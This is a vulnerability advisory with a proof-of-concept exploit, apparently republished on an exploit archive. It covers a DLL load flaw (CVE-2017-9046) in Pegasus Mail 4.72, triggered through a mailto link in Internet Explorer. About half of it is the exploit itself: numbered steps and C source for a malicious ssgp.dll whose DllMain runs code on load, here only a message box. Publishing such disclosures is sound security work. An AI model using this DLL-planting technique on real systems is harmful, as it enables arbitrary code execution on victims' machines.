Exploit for windows platform in category remote exploits
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC
Vendor:
=============
www.pmail.com
Product:
===========================
Pegasus "winpm-32.exe"
v4.72 build 572
Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served millions of users since it was released in 1990.
Vulnerability Type:
======================
Remote Code Execution
CVE Reference:
==============
CVE-2017-9046
Security Issue:
================
Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by clicking an HTML "mailto:" link
if a DLL named "ssgp.dll" exists on the victims Desktop. Tested successfully using Internet Explorer Web Browser.
e.g.
<a href="mailto:[email protected]">Link text</a>
Place "ssgp.dll" on the desktop then visit the webpage in "Internet Explorer", click the mailto: link arbitrary code executed
and Pegasus (pmail) is then launched.
User needs to have setup PMAIL with "mailto:" link option on install.
Exploit:
========
1) Set Pegasus as default Email client for opening Emails, and setup PMAIL with "mailto:" link option on install.
2) Compile "ssgp.dll" as DLL using below 'C' code.
#include<windows.h>
//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
switch (reason) {
case DLL_PROCESS_ATTACH:
MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
break;
}
return 0;
}
3) Place "ssgp.dll" on Desktop
4) Create an HTML file with following in the web server root directory.
<a href="mailto:[email protected]">Pegasus Exploit POC</a>
5) Open webpage in InternetExplorer Web Browser and click malicious mailto: link.
Our code gets executed...
# 0day.today [2018-04-10] #